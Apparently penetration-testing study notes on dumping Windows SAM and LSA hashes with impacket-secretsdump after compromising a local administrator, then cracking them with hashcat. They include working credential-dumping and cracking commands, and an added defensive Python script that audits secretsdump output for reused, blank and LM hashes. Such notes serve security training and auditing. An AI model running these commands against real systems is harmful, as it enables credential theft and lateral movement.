Dumping and Cracking Hashes

Overview

After compromising a Local Administrator account, we can dump hashes from the SAM and LSA on the machine using secretsdump. This can be done using the account's password or hash.

We can then crack the hashes using hashcat.

On older machines that have WDigest enabled, it may be possible to view passwords in cleartext.

Secretsdump

impacket-secretsdump PNPT.local/greg:'Password1'@192.168.1.130
impacket-secretsdump administrator@192.168.1.130 -hashes 'aad3b435b51404eeaad3b435b51404ee:7facdc498ed1'
hashcat -m 1000 crackme.txt ~/rockyou.txt -O -r /usr/share/hashcat/rules/InsidePro-PasswordsPro.rule
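
Added example (not part of the original notes): the user:rid:lmhash:nthash::: lines that secretsdump prints can be audited from the defender's side for local passwords shared between accounts, stored LM hashes and blank passwords. The sample lines and their hash values are constructed, and the function names are hypothetical.

```python
import re
from collections import defaultdict

# Well-known constants: the LM and NT hashes of the empty string.
# An LM field equal to EMPTY_LM means no LM hash is stored for the account.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample in the user:rid:lmhash:nthash::: layout (hashes are made up).
SAMPLE = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
legacy:1002:00112233445566778899aabbccddeeff:fedcba9876543210fedcba9876543210:::
[*] Cleaning up...
"""

HASH_LINE = re.compile(r"([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::")


def parse_line(line):
    """Return (user, rid, lm, nt) for a hash line, or None for status/other lines."""
    m = HASH_LINE.fullmatch(line.strip())
    if m is None:
        return None
    user, rid, lm, nt = m.groups()
    return user, int(rid), lm.lower(), nt.lower()


def audit(text):
    """Group accounts by finding: stored LM hash, blank password, shared NT hash."""
    findings = {"lm_stored": [], "blank_password": [], "reused": []}
    by_nt = defaultdict(list)
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        user, _rid, lm, nt = rec
        if lm != EMPTY_LM:
            findings["lm_stored"].append(user)       # weak LM hash still kept
        if nt == EMPTY_NT:
            findings["blank_password"].append(user)  # account has no password
        else:
            by_nt[nt].append(user)
    # Identical NT hashes mean identical passwords (NT hashes are unsalted).
    findings["reused"] = sorted(sorted(u) for u in by_nt.values() if len(u) > 1)
    return findings


if __name__ == "__main__":
    for finding, accounts in audit(SAMPLE).items():
        print(finding, accounts)
```

Accounts listed under reused share one password, so a single recovered hash or cracked password covers all of them; unique per-machine local administrator passwords remove that finding.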